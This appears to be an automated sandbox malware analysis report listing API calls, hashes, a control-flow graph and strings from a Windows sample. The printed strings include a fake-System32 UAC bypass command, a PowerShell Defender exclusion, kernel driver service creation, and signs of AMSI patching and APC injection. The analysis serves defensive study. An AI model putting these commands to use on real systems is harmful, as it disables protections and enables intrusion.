                                                                                                                                  • Opcode ID: d16cc9ee7a391a20d893867c7d681b9699d773ffe10e7dcc2dcbd20459b4f1db
                                                                                                                                  • Instruction ID: e004e75d2ecb2efa8f846c88165529b90f53d6f14bf5a1f5aa084589c6bb69e1
                                                                                                                                  • Opcode Fuzzy Hash: d16cc9ee7a391a20d893867c7d681b9699d773ffe10e7dcc2dcbd20459b4f1db
                                                                                                                                  • Instruction Fuzzy Hash: DF0144B5A10608BAEB10EFE0CC82FDEB7BCDB48705F504461E500E2581EB74BB04CA64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041FEF38: CLSIDFromProgID.OLE32(00000000,?,00000000,041FEF85,?,?,?,00000000), ref: 041FEF65
                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,041FF078,00000000,00000000,041FEFF7,?,00000000,041FF067), ref: 041FEFE3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFromInstanceProg
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2151042543-0
                                                                                                                                  • Opcode ID: 282f63acc61a265fcfdaaa266653edb65b2929194b7720023c6d7dfd7beaf98a
                                                                                                                                  • Instruction ID: 4a31aa7393d2b7238f9695277110a4041654c5fce0c254b59b96018a64c6622d
                                                                                                                                  • Opcode Fuzzy Hash: 282f63acc61a265fcfdaaa266653edb65b2929194b7720023c6d7dfd7beaf98a
                                                                                                                                  • Instruction Fuzzy Hash: D901F774618704AFE715DF619C92C7EBBACD749700FA20435FA00D2690EB7179028964
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,0424967E), ref: 04249612
                                                                                                                                    • Part of subcall function 04227420: GetCurrentProcessId.KERNEL32(?,00000000,04227598), ref: 04227441
                                                                                                                                    • Part of subcall function 04227420: GlobalAddAtomA.KERNEL32(00000000), ref: 04227474
                                                                                                                                    • Part of subcall function 04227420: GetCurrentThreadId.KERNEL32 ref: 0422748F
                                                                                                                                    • Part of subcall function 04227420: GlobalAddAtomA.KERNEL32(00000000), ref: 042274C5
                                                                                                                                    • Part of subcall function 04227420: RegisterWindowMessageA.USER32(00000000,00000000,?,?,00000000,04227598), ref: 042274DB
                                                                                                                                    • Part of subcall function 04227420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,04227598), ref: 0422755F
                                                                                                                                    • Part of subcall function 04227420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 04227570
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AtomCurrentGlobal$AddressHandleMessageModuleProcProcessRegisterThreadVersionWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3557136124-0
                                                                                                                                  • Opcode ID: 0858e47a4dab36d5be3f7fc80b2f16d6166ed334cb0daee552324e70647ee2de
                                                                                                                                  • Instruction ID: 5ff1d7ea4e76d77aee6f077592698bc85a5e7b13955c3eab70bddf31cedb5649
                                                                                                                                  • Opcode Fuzzy Hash: 0858e47a4dab36d5be3f7fc80b2f16d6166ed334cb0daee552324e70647ee2de
                                                                                                                                  • Instruction Fuzzy Hash: 3AF0497931A600AFF351FF28FDC981A37E9E7DA60439144B0E51087664CBB9BC86CA54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 4960 42426a7-42438f4 call 41e4b0c call 41e4c4c call 41e4980 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 * 2 call 41e4a10 call 423b684 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 423b9d8 call 41e47dc call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 * 2 call 41e4a10 call 423b684 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 * 2 call 41e4a10 call 423b684 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 * 2 call 41e4a10 call 423b684 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 423b9d8 call 41e47dc call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 * 2 call 41e4a10 call 423b684 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4c4c call 41e4980 call 41e8de0 5437 4243ffc-4244285 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4980 call 41e8de0 4960->5437 5438 42438fa-4243ff7 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4c4c call 41e337c call 423bcf8 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 Sleep call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4c4c call 41e507c call 423b5fc call 41e4c4c call 41e507c call 423b5fc call 41e4c4c call 41e507c call 423b5fc call 41e4c4c call 41e507c call 423b5fc call 41e4c4c call 41e507c call 423b5fc call 41e4c4c call 41e507c call 423b5fc call 41e507c call 423b5fc call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e507c call 423b5fc call 41e507c call 423b5fc call 41e507c call 423b5fc call 41e4b0c call 41e4c4c call 41e507c call 423b5fc 4960->5438 5587 4244313-424441a call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b98 5437->5587 5588 424428b-424430e call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 WinExec 5437->5588 5438->5437 5665 4244420-42448fe call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4a98 call 41e4c4c WinExec call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4c4c call 41e4980 call 4238afc call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e38a0 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 5587->5665 5666 4244d43-4244f42 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b98 5587->5666 5588->5587 6187 4244905-4244c43 call 41f982c call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41f9a0c call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 4238e4c call 41e38d0 5665->6187 6188 4244900-4244903 5665->6188 5841 42459d6-4245b59 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b98 5666->5841 5842 4244f48-424511b call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4a98 call 41e4c4c call 41e507c call 41e50f8 CreateProcessAsUserW 5666->5842 6023 4245b5f-4245b6e call 41e4b98 5841->6023 6024 424632a-4246be3 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 * 17 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 5841->6024 6054 424511d-4245194 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 5842->6054 6055 4245199-4245228 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 5842->6055 6023->6024 6038 4245b74-4245e47 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 420cfd4 call 41e4b0c call 41e4c4c call 41e4980 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e8de0 6023->6038 6899 4246be8-4246db8 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 6024->6899 6386 42461a0-4246325 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4ca4 call 4207e4c 6038->6386 6387 4245e4d-424619b call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 423b9d8 call 41e47dc call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e50e8 * 2 call 41e4a10 call 423b684 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 6038->6387 6054->6055 6130 424522f-4245457 call 41e4ca4 call 423b848 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 423ae00 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 6055->6130 6131 424522a-424522d 6055->6131 6383 42454d5-42459d1 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 NtQueueApcThread call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 ResumeThread call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41ffcd8 * 3 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 call 41ffcd8 * 3 CloseHandle 6130->6383 6384 4245459-42454d0 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 call 41ffd38 6130->6384 6131->6130 6188->6187 6383->5841 6384->6383 6386->6024 6387->6386 6953 4246dbd-4246dc4 call 41ffd38 6899->6953 6955 4246dc9-4246e34 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 6953->6955 6967 4246e39-4246e40 call 41ffd38 6955->6967 6969 4246e45-4246eb0 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 6967->6969 6981 4246eb5-4246ebc call 41ffd38 6969->6981 6983 4246ec1-4246ee3 call 41e4980 * 2 6981->6983 6987 4246ee8-4246eef call 41ffd38 6983->6987 6989 4246ef4-4246f16 call 41e4980 * 2 6987->6989 6993 4246f1b-4246f22 call 41ffd38 6989->6993 6995 4246f27-4246f49 call 41e4980 * 2 6993->6995 6999 4246f4e-4246f55 call 41ffd38 6995->6999 7001 4246f5a-4246f7c call 41e4980 * 2 6999->7001 7005 4246f81-4246f88 call 41ffd38 7001->7005 7007 4246f8d-42472d5 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4980 * 2 call 41ffd38 call 41e4b0c call 41e4c4c call 41e4980 call 41e8de0 7005->7007 7106 4247373-42473de call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 7007->7106 7107 42472db-4247316 call 41e4a98 call 41e4c4c call 41e4980 call 41e8de0 7007->7107 7131 42473e3-42473ea call 41ffd38 7106->7131 7107->7106 7124 4247318-424736e call 41e4b0c call 41e4c4c call 41e4a98 call 41e4c4c CopyFileA 7107->7124 7124->7106 7135 42473ef-424745a call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 7131->7135 7150 424745f-4247466 call 41ffd38 7135->7150 7152 424746b-42474d6 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 7150->7152 7164 42474db-42474e2 call 41ffd38 7152->7164 7166 42474e7-4247552 call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 7164->7166 7178 4247557-424755e call 41ffd38 7166->7178 7180 4247563-42475ce call 41e4b0c call 41e4c4c call 41e4980 call 41e4a98 call 41e4c4c call 41e4980 7178->7180 7192 42475d3-42475da call 41ffd38 7180->7192 7194 42475df-42475ee GetCurrentProcess call 41ffcd8 7192->7194 7196 42475f3-42475f5 ExitProcess 7194->7196
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
                                                                                                                                    • Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
                                                                                                                                    • Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
                                                                                                                                    • Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
                                                                                                                                    • Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
                                                                                                                                    • Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4
                                                                                                                                    • Part of subcall function 0423B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B756), ref: 0423B6C3
                                                                                                                                    • Part of subcall function 0423B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0423B6FD
                                                                                                                                    • Part of subcall function 0423B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0423B72A
                                                                                                                                    • Part of subcall function 0423B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0423B733
                                                                                                                                    • Part of subcall function 041E8DE0: GetFileAttributesA.KERNEL32(00000000,?,0423D4C6,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanString,0427A350,04247AE0,UacScan,0427A350,04247AE0,UacInitialize), ref: 041E8DEB
                                                                                                                                  • Sleep.KERNEL32(00002328,UacScan,0427A350,04247AE0,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,OpenSession,0427A350,04247AE0), ref: 04243C10
                                                                                                                                    • Part of subcall function 0423B5FC: RtlInitUnicodeString.N(?,?,00000000,0423B676), ref: 0423B624
                                                                                                                                    • Part of subcall function 0423B5FC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B63A
                                                                                                                                    • Part of subcall function 0423B5FC: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0423B676), ref: 0423B659
                                                                                                                                  • WinExec.KERNEL32(cmd /c "C:\\Windows \\System32\\easinvoker.exe",00000000), ref: 0424430E
                                                                                                                                  • WinExec.KERNEL32(00000000,00000000), ref: 042445B8
                                                                                                                                    • Part of subcall function 04238AFC: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 04238BBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePath$CurrentExecLibraryMemoryNameName_ProcessStringVirtualWrite$AddressAttributesCloseCompareCreateDeleteFreeHandleInitLoadModuleProcProtectSleepUnicode
                                                                                                                                  • String ID: C : \Win do ws \ Sys tem 32\KD EC O.b at$C :\W ind ow s \Sys tem 32 \NETU TI LS.d ll$C :\W indo ws \S yst em 32\ eas invo ker.e xe$C:\Windows \System32\KDECO.bat$C:\Windows\System32\$C:\\Windows \\System32\\easinvoker.exe$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$s.d$start /min cmd /c mkdir "\\?\C:\Windows " &mkdir "\\?\C:\Windows \System32" &ECHO F|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y &ECHO F|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y &ECHO F|xcopy "KDECO.bat" "C:\Windows \$start /min cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & sc.exe create truesight binPath="C:\Users\Public\Libraries\truesight.sys" type=kernel &sc.exe start truesight $x.bat
                                                                                                                                  • API String ID: 2820154672-430201296
                                                                                                                                  • Opcode ID: 19411da5c51345ff451c4bb0352154127d42eb9e04e7fffa396234d25f749e8f
                                                                                                                                  • Instruction ID: a3ed6ccd5ecf4ddd76a703c2ae7f1a050bbe45907f2c6bd251b394f2db39d766
                                                                                                                                  • Opcode Fuzzy Hash: 19411da5c51345ff451c4bb0352154127d42eb9e04e7fffa396234d25f749e8f
                                                                                                                                  • Instruction Fuzzy Hash: C3131C39B10519CBEB14EBA5DDC1BEEB3B5EF88208F1045E2D109A7654DB70BE868F44
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
